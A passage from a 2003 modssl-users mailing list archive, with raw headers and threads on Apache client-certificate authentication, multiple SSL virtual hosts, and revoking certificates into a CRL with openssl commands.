    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
  

  
    DocumentRoot        /some/doc/root
    SSLEngine on
    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
  

--
Steve (egrep)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 10:43:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 435532AA014; Wed, 19 Feb 2003 10:43:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from olympos.ccf.auth.gr (olympos.ccf.auth.gr [155.207.112.1])
	by master.modssl.org (Postfix) with ESMTP id 986722AA000
	for ; Wed, 19 Feb 2003 10:43:17 +0100 (CET)
Received: from ccf.auth.gr (afrodite.ccf.auth.gr [155.207.112.23])
	(authenticated bits=0)
	by olympos.ccf.auth.gr (8.12.5/8.12.5) with ESMTP id h1ECOiSh010899
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NOT)
	for ; Fri, 14 Feb 2003 14:24:45 +0200 (EET)
Message-ID: <3E4CE00B.3F7FC9D4@ccf.auth.gr>
Date: Fri, 14 Feb 2003 14:24:43 +0200
From: Sophia Petridou 
Organization: Network Operation Center, AUTh
X-Mailer: Mozilla 4.8 [en] (Windows NT 5.0; U)
X-Accept-Language: el,en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: certificate authentication & alternate authentication & REMOTE_USER 
 variable 
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms8679801014D6A9FDDB2186E5"
X-Virus-Scanned: by olympos.ccf.auth.gr. Virus data file v4247 created Feb 12 2003
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sophia Petridou 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms8679801014D6A9FDDB2186E5
Content-Type: multipart/alternative;
 boundary="------------A722A0432D9E9DD5DCCA47F3"


--------------A722A0432D9E9DD5DCCA47F3
Content-Type: text/plain; charset=iso-8859-7
Content-Transfer-Encoding: 7bit

Hi all,

SERVER: Apache 1.3.27 + mod_ssl/2.8.12
My problem:
I want to authenticate clients of my domain based on certificates
and obtain my users' usenames. I try using the two methods mentioned
in http://www.modssl.org/docs/2.8/ssl_howto.html#ToC9
but they don't seem to be completely equivalent.
Specifically, when I try without SSLRequire and Load an authentication
module such as mod_auth_ldap or mod_auth_mysql (in order to offer
an alternate authentication schema - Satisfy any), in the browser,
a dialog window appears asking for Username/Password just after the
window for chosing the certificate.

This window (asking for username/password) does not appear
1. when I use SSLRequire directive and load other modules (but
REMOTE_USER variable is empty) and
2. when I use AuthUserFile directive and don't load the modules (but I
can't offer  alternate authentication)

Apache configuration
------------------------

#LoadModule ldap_auth_module   libexec/mod_auth_ldap.so

SSLCACertificatePath /etc/apache/conf/ssl.crt
SSLCACertificateFile /etc/apache/conf/ssl.crt/ca-bundle.crt
SSLVerifyClient 0


    AllowOverride None
    Options None
    Order deny,allow
    Deny from all
    Allow from localnetwork

    SSLVerifyClient require
    SSLVerifyDepth  2
    SSLOptions      +FakeBasicAuth +StdEnvVars
    SSLRequireSSL
    #SSLRequire      %{SSL_CLIENT_S_DN_O}  eq "My Organization" and \
    #                       %{SSL_CLIENT_S_DN_OU} eq "My Departement"

    AuthName            "Certificate Authentication"
    AuthType             Basic
    AuthUserFile         /path/to/httpd.passwd
    require                 valid-user

    #Satisfy any
    #AuthType Basic
    #AuthName "LDAP Authentication"
    #LDAP_Server MyLdapServer
    #LDAP_Port 389
    #Base_DN "o=MyOrganization,c=GR"
    #UID_Attr uid
    #require valid-user


thanks in advance
-sophia

--------------A722A0432D9E9DD5DCCA47F3
Content-Type: text/html; charset=iso-8859-7
Content-Transfer-Encoding: 7bit



Hi all,

SERVER: Apache 1.3.27 + mod_ssl/2.8.12

My problem:

I want to authenticate clients of my domain based on certificates

and obtain my users' usenames. I try using the two methods mentioned

in http://www.modssl.org/docs/2.8/ssl_howto.html#ToC9

but they don't seem to be completely equivalent.

Specifically, when I try without SSLRequire and Load an authentication

module such as mod_auth_ldap or mod_auth_mysql (in order to offer

an alternate authentication schema - Satisfy any), in the browser,

a dialog window appears asking for Username/Password just after the

window for chosing the certificate.

This window (asking for username/password) does not appear

1. when I use SSLRequire directive and load other modules (but REMOTE_USER
variable is empty) and

2. when I use AuthUserFile directive and don't load the modules (but
I can't offer  alternate authentication)

Apache configuration

------------------------

#LoadModule ldap_auth_module   libexec/mod_auth_ldap.so

SSLCACertificatePath /etc/apache/conf/ssl.crt

SSLCACertificateFile /etc/apache/conf/ssl.crt/ca-bundle.crt

SSLVerifyClient 0

<Directory "/apache/secure/area">

    AllowOverride None

    Options None

    Order deny,allow

    Deny from all

    Allow from localnetwork

    SSLVerifyClient require

    SSLVerifyDepth  2

    SSLOptions      +FakeBasicAuth
+StdEnvVars

    SSLRequireSSL

    #SSLRequire      %{SSL_CLIENT_S_DN_O} 
eq "My Organization" and \

    #                      
%{SSL_CLIENT_S_DN_OU} eq "My Departement"

    AuthName           
"Certificate Authentication"

    AuthType            
Basic

    AuthUserFile        
/path/to/httpd.passwd

    require                
valid-user

    #Satisfy any

    #AuthType Basic

    #AuthName "LDAP Authentication"

    #LDAP_Server MyLdapServer

    #LDAP_Port 389

    #Base_DN "o=MyOrganization,c=GR"

    #UID_Attr uid

    #require valid-user

</Directory>

thanks in advance

-sophia

--------------A722A0432D9E9DD5DCCA47F3--

--------------ms8679801014D6A9FDDB2186E5
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIIPEgYJKoZIhvcNAQcCoIIPAzCCDv8CAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
DK0wggYbMIIFA6ADAgECAgUBAAAADTANBgkqhkiG9w0BAQQFADCByDELMAkGA1UEBhMCR1Ix
LTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcGA1UE
CxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxNDAyBgNVBAMTK0FVVEggTm9j
IFVzZXJzIENlcnRpZmljYXRpb24gQXV0aG9yaXR5IDIwMDMxKTAnBgkqhkiG9w0BCQEWGm5v
Y3VzZXJzY2EyMDAzQGNjZi5hdXRoLmdyMB4XDTAzMDEyMjAwMDAwMFoXDTA0MDEyMTIzNTk1
OVowgaYxCzAJBgNVBAYTAkdSMS0wKwYDVQQKEyRBcmlzdG90bGUgVW5pdmVyc2l0eSBvZiBU
aGVzc2Fsb25pa2kxKTAnBgNVBAsTIENlbnRyYWwgQ29tbXVuaWNhdGlvbiBGYWNpbGl0aWVz
MRgwFgYDVQQDEw9Tb3BoaWEgUGV0cmlkb3UxIzAhBgkqhkiG9w0BCQEWFHNwZXRyaWRvQGNj
Zi5hdXRoLmdyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2NedY3VwKoMWWtG5toO40
O2o9vrw1r4upJr4aL0EH9+vE8+BIgCROggO+Lw5fLUomoQW3qnnJFrT4mz9Lu7R8jjxx1VLi
B2rfX3x7DIN1a5hDTXNNrMGOnQDCwnCPhKpyarpO9CsNK59Ttdu/sy0ByUGplkmbCDi+AaQo
GT4RvwIDAQABo4ICrjCCAqowDAYDVR0TAQH/BAIwADARBglghkgBhvhCAQEEBAMCBaAwDgYD
VR0PAQH/BAQDAgXgMB0GA1UdDgQWBBTliUZt1gz0A6fBRNoPvLJgR6B9mDCBxAYDVR0jBIG8
MIG5gBTCkOKB+mQJxDKdYGzsJA/aHg95OaGBmaSBljCBkzELMAkGA1UEBhMCR1IxLTArBgNV
BAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcGA1UECxMgQ2Vu
dHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxKjAoBgNVBAMTIVJvb3QgQ2VydGlmaWNh
dGlvbiBBdXRob3JpdHkgMjAwMYIFAQAAAAcwHwYDVR0RBBgwFoEUc3BldHJpZG9AY2NmLmF1
dGguZ3IwJQYDVR0SBB4wHIEabm9jdXNlcnNjYTIwMDNAY2NmLmF1dGguZ3IwQQYDVR0fBDow
ODA2oDSgMoYwaHR0cDovL3d3dy5hdXRoLmdyL0NBL25vY3VzZXJzMjAwMy9jcmx2MS5kZXIu
Y3JsMIIBBAYDVR0gBIH8MIH5MIH2BgsrBgEEAbwdAgIBATCB5jAsBggrBgEFBQcCARYgaHR0
cDovL3d3dy5hdXRoLmdyL0NBL0NQU3YxLmh0bWwwgbUGCCsGAQUFBwICMIGoMDQWLUFyaXN0
b3RsZSBVbml2ZXJzaXR5IE5ldHdvcmsgT3BlcmF0aW9uIENlbnRlcjADAgEBGnBUaGlzIGNl
cnRpZmljYXRlIGlzIHN1YmplY3QgdG8gR3JlZWsgbGF3cyBhbmQgb3VyIENQUy4gVGhpcyBD
ZXJ0aWZpY2F0ZSBtdXN0IG9ubHkgYmUgdXNlZCBmb3IgYWNhZGVtaWMgcHVycG9zZXMuMA0G
CSqGSIb3DQEBBAUAA4IBAQAPTSmZWYZD79UmL43CAdhG9PhB0J33lY41i+XjSsVRSTkyS7ei
YvEgifiogF5CNjzmqboRbWauEtXLvtB/BWY4oDyXjcM5PQw7IhAgqRQeGT5nHYHlfr6jNChS
n21JKJwP+9H4a9BIdHRq1Oqnmst7AI4D/IsyxpANrINTNp196lTbYmaedxCyk0uuSHu9Q1gl
DCrSr510WVAwi6GldbwYwFnTGAZjiUL7I1yYNWuU1OVFsZqbQEWWoXKIPMH8W7LS/17UW00+
YtihMp075xtipxnrKfSvsiVMMI2ecXpWcxzoj/oILeVhMYjC7GvQd4aFpKj6nnIsQOAme8Fi
P0wrMIIGijCCBXKgAwIBAgIFAQAAAAcwDQYJKoZIhvcNAQEEBQAwgZMxCzAJBgNVBAYTAkdS
MS0wKwYDVQQKEyRBcmlzdG90bGUgVW5pdmVyc2l0eSBvZiBUaGVzc2Fsb25pa2kxKTAnBgNV
BAsTIENlbnRyYWwgQ29tbXVuaWNhdGlvbiBGYWNpbGl0aWVzMSowKAYDVQQDEyFSb290IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5IDIwMDEwHhcNMDMwMTE3MTMzMDA2WhcNMDUwMTE2MTMz
MDA2WjCByDELMAkGA1UEBhMCR1IxLTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9m
IFRoZXNzYWxvbmlraTEpMCcGA1UECxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRp
ZXMxNDAyBgNVBAMTK0FVVEggTm9jIFVzZXJzIENlcnRpZmljYXRpb24gQXV0aG9yaXR5IDIw
MDMxKTAnBgkqhkiG9w0BCQEWGm5vY3VzZXJzY2EyMDAzQGNjZi5hdXRoLmdyMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAn66s2lErvnV9LCcBkrnk+SHe9lGDXGXQMgnmg5Ys
1UugC2UEdN2EBb16gcLGnhqDvKf8IEbIfVp4kTClGON4g2Dumkfqged07sOTpPhMdATbcZ+6
PSAnltpX1xs7OA5wvBvJJHRhguSdCYFsC3fipWzmgvgmBQOZybyp/maQtGocOT8jmnStPQAR
KZPO05WHVNY94xb7tUrQxT0Or2HmQD1aRUc+1PnRIkXBOprD5KoZ432bCb9ubdzaCH+j9fb7
kYTHSKYr2U2T3zTFBGZwtfz8TqZ+n7HpRInOwCdITMxb79bzYbj90Xvdqq3r3LsBvDAYLbnE
kCCMbAFZWgf3/wIDAQABo4ICrDCCAqgwEgYDVR0TAQH/BAgwBgEB/wIBADALBgNVHQ8EBAMC
AQYwEQYJYIZIAYb4QgEBBAQDAgAHMB0GA1UdDgQWBBTCkOKB+mQJxDKdYGzsJA/aHg95OTCB
wAYDVR0jBIG4MIG1gBQz5TBgiVRronFpRSFqG2cC+TNJ4KGBmaSBljCBkzELMAkGA1UEBhMC
R1IxLTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcG
A1UECxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxKjAoBgNVBAMTIVJvb3Qg
Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkgMjAwMYIBADAlBgNVHREEHjAcgRpub2N1c2Vyc2Nh
MjAwM0BjY2YuYXV0aC5ncjAhBgNVHRIEGjAYgRZyb290Y2EyMDAxQGNjZi5hdXRoLmdyMD0G
A1UdHwQ2MDQwMqAwoC6GLGh0dHA6Ly93d3cuYXV0aC5nci9DQS9yb290MjAwMS9jcmx2MS5k
ZXIuY3JsMIIBBQYDVR0gBIH9MIH6MIH3BgwrBgEEAbwdAgEBAQEwgeYwLAYIKwYBBQUHAgEW
IGh0dHA6Ly93d3cuYXV0aC5nci9DQS9DUFN2MS5odG1sMIG1BggrBgEFBQcCAjCBqDA0Fi1B
cmlzdG90bGUgVW5pdmVyc2l0eSBOZXR3b3JrIE9wZXJhdGlvbiBDZW50ZXIwAwIBARpwVGhp
cyBjZXJ0aWZpY2F0ZSBpcyBzdWJqZWN0IHRvIEdyZWVrIGxhd3MgYW5kIG91ciBDUFMuIFRo
aXMgQ2VydGlmaWNhdGUgbXVzdCBvbmx5IGJlIHVzZWQgZm9yIGFjYWRlbWljIHB1cnBvc2Vz
LjANBgkqhkiG9w0BAQQFAAOCAQEAMVIuv6l/Uaz6xrXH6YVBWK5+ss6PfCJ8uQVGDrXXpt5A
+teipdONMeq9ApuY5cM78jcqJI/X5bq72AT/M0v/LU+MqwBTudWzykUO5Mu54gcsQuutMsiu
+5CcmTrbQr58C+BaIez2FUdTgewMbS7WsnG3BS28EhtSvKs8d7EVyRJkj+rbNCzcTi1qq/1T
A3APGnK2wVqjyS3l4JbhTSJN3RUTXH9OTr+lx7aHvX51YAnaMVGJprN/fsvl0+tP14Bx10Cr
HduRoqeCQfXe60KTWnf6p86+DNocGCVxlq7aUafeXj7U8xoqSL7/5Phj/XZWCTHqYKPKSRLQ
Jj7Z54DEcTGCAi0wggIpAgEBMIHSMIHIMQswCQYDVQQGEwJHUjEtMCsGA1UEChMkQXJpc3Rv
dGxlIFVuaXZlcnNpdHkgb2YgVGhlc3NhbG9uaWtpMSkwJwYDVQQLEyBDZW50cmFsIENvbW11
bmljYXRpb24gRmFjaWxpdGllczE0MDIGA1UEAxMrQVVUSCBOb2MgVXNlcnMgQ2VydGlmaWNh
dGlvbiBBdXRob3JpdHkgMjAwMzEpMCcGCSqGSIb3DQEJARYabm9jdXNlcnNjYTIwMDNAY2Nm
LmF1dGguZ3ICBQEAAAANMAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEH
ATAcBgkqhkiG9w0BCQUxDxcNMDMwMjE0MTIyNDQzWjAjBgkqhkiG9w0BCQQxFgQU2ayRVuxT
HiiIfJe6CWYyXNcDSwwwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0D
AgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcN
AQEBBQAEgYCDyu/khX6vnRNdt/zeFxmAZZyq7Y/dKGuyuHiRCnlpddooXYa449x2mqsiJRKL
8EBChav3rIW7clPqmwvzM7h3KloJupqSX8e/eml1VKNvrYHqXSG9tDAuMtoAUfixDoqmKs95
0aw3YmE/LjCwb4qAFIBeBiiJRswK62hLwPtjuw==
--------------ms8679801014D6A9FDDB2186E5--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 11:42:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CF2F62AA014; Wed, 19 Feb 2003 11:42:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 2E1BA2AA000
	for ; Wed, 19 Feb 2003 11:42:38 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h1JAgZFY009947
	for ; Wed, 19 Feb 2003 11:42:35 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1JAgY2M005156
	for ; Wed, 19 Feb 2003 11:42:34 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: Multiple SSL VirtualHosts in apache
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Date: Wed, 19 Feb 2003 11:42:34 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Multiple SSL VirtualHosts in apache
Importance: normal
thread-index: AcLX/MqiljdYyYLbRIK2ftFDtHiMWQABnnrA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Steve Pirk [mailto:orion@deathcon.com]
>Sent: Donnerstag, 6. Februar 2003 02:02
>To: modssl-users@modssl.org
>Subject: Multiple SSL VirtualHosts in apache
>
>
>I check the mail archives, but could not find a good
>answer for this "problem" I am having.
>
>I am building out a dev environment using apache
>on Solaris. The dev environment needs to run under
>SSL (to simulate the production environment). I am
>starting with 4 virtual servers. They all use the
>same cert file, but are on different ports.
>
>The problem I am running into is that only the "first"
>VirtualHost works. Requests to subsequent ports result
>in a mod_ssl:error:HTTP-request error. Here is the error_log
>entry:
>
>[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL handshake failed: HTTP
>spoken on HTTPS port; trying to send HTML error page (OpenSSL library
>error follows)

This looks like you typed http://server:7001/ into the browser. You
still need to define https even if you have the port number, i.e.
https://server:7001/.

Can you confirm that if you do this, you still get an error?

Rgds,
Owen Boyle


>[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
>routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking 
>HTTP to HTTPS
>port!?]
>
>This is being used in conjunction with an auth package,
>but the redirect after logging in is https://
>
>Does anyone knnow of a good way to have multiple
>SSL virtual servers on one apache instance?

The way you are doing it is fine. You just have a probelm...

>
>Here is a sample of httpd.conf. In this case, port 7000
>works, but 7001 and 7002 get the mod_ssl error.
>
>  
>    DocumentRoot        /some/doc/root
>    SSLEngine on
>    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>  
>
>  
>    DocumentRoot        /some/doc/root
>    SSLEngine on
>    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>  
>
>  
>    DocumentRoot        /some/doc/root
>    SSLEngine on
>    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>  
>
>--
>Steve (egrep)
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 12:04:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 707B12AA014; Wed, 19 Feb 2003 12:04:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id 16AC32AA000
	for ; Wed, 19 Feb 2003 12:04:48 +0100 (CET)
Received: from conversion-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0HAJ00A01Y9E1G@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Wed, 19 Feb 2003 10:58:42 +0000 (GMT)
Received: from nawnt02.naples.eur.slb.com
 (NAWNT02.naples.eur.slb.com [134.32.195.212]) by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0HAJ009GTYGKZR@eurmta01.london.eur.slb.com> for
 modssl-users@modssl.org; Wed, 19 Feb 2003 10:57:57 +0000 (GMT)
Received: by NAWNT02.naples.eur.slb.com with Internet Mail Service
 (5.5.2653.19)	id ; Wed, 19 Feb 2003 11:57:23 +0100
Content-return: allowed
Date: Wed, 19 Feb 2003 11:57:20 +0100
From: Zampognaro Sergio 
Subject: add a certificate to a Certificate Revocation List
To: modssl-users@modssl.org
Message-id:
 <1F6B1C04A612D311B27400A0C9ECE51202B76520@NAWNT02.naples.eur.slb.com>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Importance: high
X-Priority: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

How to add a client certificate to an already created and empty Certificate
Revocation List?

thanks
Sergio
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 12:10:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BB37C2AA014; Wed, 19 Feb 2003 12:10:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 6ABBD2AA000
	for ; Wed, 19 Feb 2003 12:10:24 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 79A3C6E4065; Wed, 19 Feb 2003 12:10:14 +0100 (CET)
Date: Wed, 19 Feb 2003 12:10:14 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: add a certificate to a Certificate Revocation List
Message-ID: <20030219111014.GB9438@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <1F6B1C04A612D311B27400A0C9ECE51202B76520@NAWNT02.naples.eur.slb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1F6B1C04A612D311B27400A0C9ECE51202B76520@NAWNT02.naples.eur.slb.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Feb 19, 2003 at 11:57:20AM +0100, Zampognaro Sergio wrote:
> How to add a client certificate to an already created and empty Certificate
> Revocation List?
> 
openssl ca -revoke filename

see man ca and man crl in the openssl docs.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 12:15:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E66F32AA014; Wed, 19 Feb 2003 12:14:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 363D92AA000
	for ; Wed, 19 Feb 2003 12:14:58 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id B13BF6E4065; Wed, 19 Feb 2003 12:14:55 +0100 (CET)
Date: Wed, 19 Feb 2003 12:14:55 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: add a certificate to a Certificate Revocation List
Message-ID: <20030219111455.GC9438@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <1F6B1C04A612D311B27400A0C9ECE51202B76520@NAWNT02.naples.eur.slb.com> <20030219111014.GB9438@toftum.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030219111014.GB9438@toftum.dk>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Feb 19, 2003 at 12:10:14PM +0100, Mads Toftum wrote:
> openssl ca -revoke filename
> 
> see man ca and man crl in the openssl docs.
> 
I forgot to add this link - http://www.apacheweek.com/features/crl

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 12:16:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3E39B2AA014; Wed, 19 Feb 2003 12:16:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fyi.jobware.net (fyi.jobware.net [80.66.0.154])
	by master.modssl.org (Postfix) with ESMTP id 9C89F2AA000
	for ; Wed, 19 Feb 2003 12:16:36 +0100 (CET)
Received: from lotus.jobware.net (guardian.jobware.net [80.66.7.98])
	by fyi.jobware.net (8.11.4/8.11.3) with ESMTP id h1JBGXC03797
	for ; Wed, 19 Feb 2003 12:16:33 +0100
Received: from localhost (burkhard@localhost)
	by lotus.jobware.net (8.11.4/8.11.4) with ESMTP id h1JBGXG04152
	for ; Wed, 19 Feb 2003 12:16:33 +0100
Date: Wed, 19 Feb 2003 12:16:33 +0100 (CET)
From: Burkhard Ulrich 
To: modssl-users@modssl.org
Subject: Re: add a certificate to a Certificate Revocation List
In-Reply-To: <1F6B1C04A612D311B27400A0C9ECE51202B76520@NAWNT02.naples.eur.slb.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Burkhard Ulrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On Wed, 19 Feb 2003, Zampognaro Sergio wrote:

> How to add a client certificate to an already created and empty Certificate
> Revocation List?

Here are the instructions if you are using openssl and your own CA:

First you have to revoke the certificate:
openssl ca -revoke certificate-file

Then you have to recreate the CRL:
openssl ca -gencrl -out crl.pem

If you need DER format:
openssl crl -in crl.pem -outform der -out crl.der

Regards

Burkhard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 19 14:40:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 131A32AA014; Wed, 19 Feb 2003 14:40:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id A3E9B2AA000
	for ; Wed, 19 Feb 2003 14:40:39 +0100 (CET)
Received: by gamay.kronodoc.fi (Postfix, from userid 501)
	id A869E14033; Wed, 19 Feb 2003 15:40:36 +0200 (EET)
Received: from localhost (localhost [127.0.0.1])
